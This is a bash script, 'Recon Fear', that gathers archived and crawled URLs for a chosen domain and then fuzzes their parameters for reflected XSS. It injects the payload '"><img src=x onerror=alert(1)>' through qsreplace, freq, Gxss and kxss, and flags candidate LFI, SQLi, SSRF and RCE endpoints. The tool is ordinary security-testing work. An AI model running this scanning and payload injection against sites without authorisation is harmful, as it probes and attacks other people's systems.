Recon Fear
#!/bin/bash
# ANSI colour escape sequences, stored as literal backslash text.
# They only become colours when printed through `echo -e` or printf '%b'.
REDCOLOR='\e[31m'
GREENBOLD='\e[1;32m'
WELCOMCOLOR='\e[1;3;33m' # bold + italic yellow
CYANBOLD='\e[1;36m'
BLUE='\e[1;34m'
PURPLE='\e[1;35m'
NC='\e[0m' # resets every attribute set above
# Clear the terminal, then print the "Recon Fear" banner and credit lines.
# Globals:  CYANBOLD, REDCOLOR, WELCOMCOLOR (read)
# Requires: clear, figlet and lolcat on PATH
# Outputs:  banner text on stdout
show_welcome() {
  clear
  # figlet renders the title as ASCII art; lolcat animates the colouring.
  figlet -f slant "Recon Fear" | lolcat -a -s 100
  # %b expands the \e and \n escapes exactly as `echo -e` would.
  printf '%b\n' "${CYANBOLD}------------------------------- Created by Muhammad Asad -------------------------------\n"
  printf '%b\n' "${REDCOLOR}------------------------------------------------------------------------------------------"
  printf '%b\n' "${WELCOMCOLOR}=================================== Recon Fear ================================\n"
}
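# Main script execution: show the banner first.
show_welcome
# Start-up quotes; one is printed per run.
arr=("Knowledge is power, let’s hack it right!" "Prepare yourself for an awesome recon journey..." "Hacking is an art, not a crime.")
# Derive the modulus from the array length so the index is always valid.
# A hard-coded "% 4" on this 3-element array yields index 3 about one run
# in four, which prints an empty quote.
random=$((RANDOM % ${#arr[@]}))
# Display random message
echo -e "${GREENBOLD}${arr[$random]}\n"
# Stylish separator
echo -e "${REDCOLOR}------------------------------------------------------------------------------------------$NC\n"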
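# Ask the user for the website URL or domain
echo -e "${GREENBOLD}Enter the website URL or domain: ${NC}"
# -r keeps backslashes in the answer literal instead of treating them as escapes.
read -r website_input
echo -e "$REDCOLOR----------------------------------------------------------------------------------------------$NC\n"
# Normalize the input into two forms:
#   website_url              - the input with a scheme (https:// added when missing)
#   website_without_protocol - the bare hostname, used to build the archive query
if [[ $website_input =~ ^https?:// ]]; then
  website_url="$website_input"
  website_without_protocol="${website_input#*://}" # drops http:// or https://
else
  website_url="https://$website_input"
  website_without_protocol="$website_input"
fi
# Reduce to the hostname: cut any path/query/fragment, then userinfo, then port.
# A value such as "example.com/login" would otherwise corrupt the archive query.
website_without_protocol="${website_without_protocol%%[/?#]*}"
website_without_protocol="${website_without_protocol##*@}"
website_without_protocol="${website_without_protocol%%:*}"
# The hostname is interpolated unescaped into a URL later on, so accept only
# hostname characters; this rejects spaces, '&', '#', quotes and an empty answer.
host_pattern='^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$'
if [[ ! $website_without_protocol =~ $host_pattern ]]; then
  printf '%b%s%b\n' "${REDCOLOR}" "Invalid target: enter a hostname such as example.com or a URL such as https://example.com" "${NC}" >&2
  exit 1
fi
# Inform the user of the normalized values being used.
# The user-supplied part goes through %s so backslashes in it are not expanded.
printf '%b%s\n' "${REDCOLOR}Normalized URL with protocol: " "$website_url"
printf '%b%s\n' "${REDCOLOR}Website URL without protocol: " "$website_without_protocol"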
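# Start every run from an empty results directory. Anything left in
# endpoints_output by a previous run is deleted here, so copy results
# elsewhere first if they are still needed.
output_dir="endpoints_output"
# -f keeps the first run quiet when the directory does not exist yet;
# ${output_dir:?} aborts instead of running rm -rf on an empty path.
rm -rf -- "${output_dir:?}"
if ! mkdir -p -- "$output_dir"; then
  echo "Cannot create output directory: $output_dir" >&2
  exit 1
fi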
# Read URLs on stdin, drop those that point at static or binary assets, and
# strip the port suffixes :80, :443, :8443 and :8080 from the rest.
# Outputs: surviving URLs on stdout, one per line.
# NOTE(review): removing :8443 and :8080 changes which port the URL refers to,
# so later probes of that URL go to the scheme's default port - confirm intent.
# NOTE(review): the extension list includes 0-4, so a path segment such as
# "/v1.2/" is also treated as static and dropped - confirm intent.
filter_static() {
  local static_asset_re='\.(css|js|jpe?g|png|gif|webm|avi|dll|pl|c|py|sh|deb|exe|zip|mp4|mp3|mpeg|mpg|flv|wmv|wma|aac|m4a|ogg|bat|dat|cfg|bin|tiff?|csv|ttf|pptx?|ppsx|docx?|xlsx?|mpp|mdb|json|woff2?|svg|txt|jar|pdf|ico|0|1|2|3|4|m4r|kml|pro|yao|gcn3|egy|par|lin|yht)([/?#\.].*|$)'
  # -v inverts the match, -i ignores case, so ".PNG" is dropped like ".png".
  grep -E -v -i -- "$static_asset_re" |
    sed -E \
      -e 's/:80([/?#]|$)/\1/g' \
      -e 's/:443([/?#]|$)/\1/g' \
      -e 's/:8443([/?#]|$)/\1/g' \
      -e 's/:8080([/?#]|$)/\1/g'
}
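# Passive collection: ask the Wayback Machine CDX API for archived URLs under
# the target and save them to wayback.txt.
# website_without_protocol is interpolated into the query string unescaped, so
# it must contain hostname characters only.
echo -e "${REDCOLOR}Running waybackurl passively..."
if ! wget -O "$output_dir/wayback.txt" "https://web.archive.org/cdx/search/cdx?url=*.$website_without_protocol/*&output=text&fl=original&collapse=urlkey&from="; then
  echo -e "${REDCOLOR}wget could not fetch the archive listing; wayback.txt may be empty or partial${NC}" >&2
fi
# Active collection: katana crawls every host listed in the file below.
# That list is produced outside this script and is independent of the domain
# entered at the prompt, so check that both refer to the same target.
echo -e "${REDCOLOR}Running Katana Actively..."
live_subdomains_file="/home/kali/target/subdomains_output/livesubdomains.txt"
if [[ -r $live_subdomains_file ]]; then
  katana -o "$output_dir/katana.txt" < "$live_subdomains_file"
else
  echo -e "${REDCOLOR}Live-subdomain list not readable, skipping katana: $live_subdomains_file${NC}" >&2
fi
# Make sure both inputs exist so the merge works even if a step was skipped.
: >> "$output_dir/wayback.txt"
: >> "$output_dir/katana.txt"
# Merge and de-duplicate both sources into xss_vibes.txt (also echoed to the terminal).
sort -u -- "$output_dir/wayback.txt" "$output_dir/katana.txt" | tee "$output_dir/xss_vibes.txt"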
# Reduce the merged list (xss_vibes.txt): drop static assets, let uro collapse
# near-duplicate URLs, and keep only URLs for which httpx sees HTTP 200.
echo -e "${GREENBOLD}Filtering Unique Endpoints for Vulnerabilities ..."
filter_static < "$output_dir/xss_vibes.txt" | uro | httpx -mc 200 -silent | tee "$output_dir/endpoints.txt"
# Keep only endpoints that carry a query parameter (contain "=").
echo -e "Filtering Parameters for Vulnerabilities ..."
filter_static < "$output_dir/endpoints.txt" | grep "=" | sort -u | tee "$output_dir/fuzz_parameters.txt"
# Substitute every parameter value with a marker string, request the results
# with freq, and collect the URLs from the lines it labels "XSS FOUND".
# A reflected marker is a lead to verify by hand, not proof of exploitable XSS.
echo -e "${CYANBOLD}Filtering Unique Endpoints for Vulnerabilities ..."
filter_static < "$output_dir/fuzz_parameters.txt" | qsreplace '"><img src=x onerror=alert(1)>' | tee "$output_dir/xss_fuzz.txt"
freq < "$output_dir/xss_fuzz.txt" | tee "$output_dir/possible_xss.txt"
grep "XSS FOUND" < "$output_dir/possible_xss.txt" | sed 's/XSS FOUND: //' | tee "$output_dir/reflected-xss.txt"
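# Reflection check on every parameterised endpoint with Gxss; results go to
# confirm-xss.txt and are echoed to the terminal.
# echo needs -e here: without it the colour code is printed as literal "\e[1;34m".
echo -e "${BLUE}Running XSS Testing on All Parameters with Quick Analysis..."
filter_static < "$output_dir/fuzz_parameters.txt" | Gxss -c 100 -p '">asad<hacked' | tee "$output_dir/confirm-xss.txt"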
# Sort the live endpoints into per-class candidate lists with gf.
# gf matches on the URL text only, so each output file is a list of URLs whose
# shape suggests the class, not a list of confirmed findings.
echo -e "${REDCOLOR}Filtering URLs for potential vulnerabilities... (XSS, Open Redirect, LFI, etc.)"
# gf pattern name and the output file stem it feeds, index by index.
gf_patterns=(xss redirect lfi sqli ssrf rce)
gf_outputs=(xss_endpoints open_redirect_endpoints lfi_endpoints sqli_endpoints ssrf_endpoints rce_endpoints)
for gf_index in "${!gf_patterns[@]}"; do
  gf "${gf_patterns[$gf_index]}" < "$output_dir/endpoints.txt" | sort -u > "$output_dir/${gf_outputs[$gf_index]}.txt"
done
# Additional steps (Arjun, x8, etc.) would follow the same pattern, appending results to the appropriate subdomain folder
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Select endpoints whose URL ends in a server-side page extension; these are
# the inputs for hidden-parameter discovery. The "$" anchor means URLs that
# already carry a query string are not selected.
echo -e "${PURPLE}Filtering Ext-Endpoint for Find Hidden Parameters with Arjun..."
grep -Ei '\.(php|html|shtml|xhtml|xhtm|htm|htn|asp|aspx|ashx|asmx|pl|cfm|jsp|jspx|jsf|do|act|action)$' < "$output_dir/endpoints.txt" | tee -a "$output_dir/ext_endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# De-duplicate that list and keep only URLs for which httpx sees HTTP 200.
echo -e "Ext-Endpoints Filtering Unique for Parameter Fuzzing with Arjun..."
filter_static < "$output_dir/ext_endpoints.txt" | uro | httpx -mc 200 -silent | tee "$output_dir/arjun_ext-endpoints.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
# Run Arjun over the surviving endpoints and write its text report.
echo -e "Running Arjun to find Ext-Endpoints for Find Hidden Parameters..."
arjun -i "$output_dir/arjun_ext-endpoints.txt" -oT "$output_dir/arjun_result_ext_endpoints.txt"
# Split each reported URL on "?" and "&" and emit one "base?name=" line per
# parameter, with the value left empty.
awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' < "$output_dir/arjun_result_ext_endpoints.txt" | tee "$output_dir/arjun-xss.txt"
# Feed the single-parameter URLs to kxss and Gxss; both result files are
# appended to (tee -a), not overwritten.
kxss < "$output_dir/arjun-xss.txt" | tee -a "$output_dir/kxss-result.txt"
Gxss -c 100 -p asad < "$output_dir/arjun-xss.txt" | tee -a "$output_dir/Gxss-result.txt"
echo -e "$GREENBOLD----------------------------------------------------------------------------------------------$NC\n"
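# Summary of result files. The names printed here must match the files the
# script actually writes under the output directory.
# NOTE(review): no visible step runs x8 or writes x8_xss.txt; drop the next
# line or add the step that produces the file.
echo -e "${REDCOLOR} - Vulnerable XSS Hidden Parameters by find with x8: x8_xss.txt...\n"
# The Arjun-derived list is written as arjun-xss.txt (hyphen, not underscore).
echo -e "${REDCOLOR} - Vulnerable XSS Hidden Parameters by find with Arjun: arjun-xss.txt...\n"
echo -e "${REDCOLOR} - Vulnerable XSS Hidden Parameters by find KXSS: kxss-result.txt...\n"
# This file comes from Gxss, not kxss, and its name ends in ".txt".
echo -e "${REDCOLOR} - Vulnerable XSS Hidden Parameters by find Gxss: Gxss-result.txt...\n"
# Notify user that all tasks are complete for all subdomains
echo -e "${GREENBOLD}----------------------------------------------------------------------------------------------$NC\n"
# Reset the colour at the end so the user's prompt is not left red.
echo -e "${REDCOLOR}All tasks are complete for all subdomains...${NC}\n"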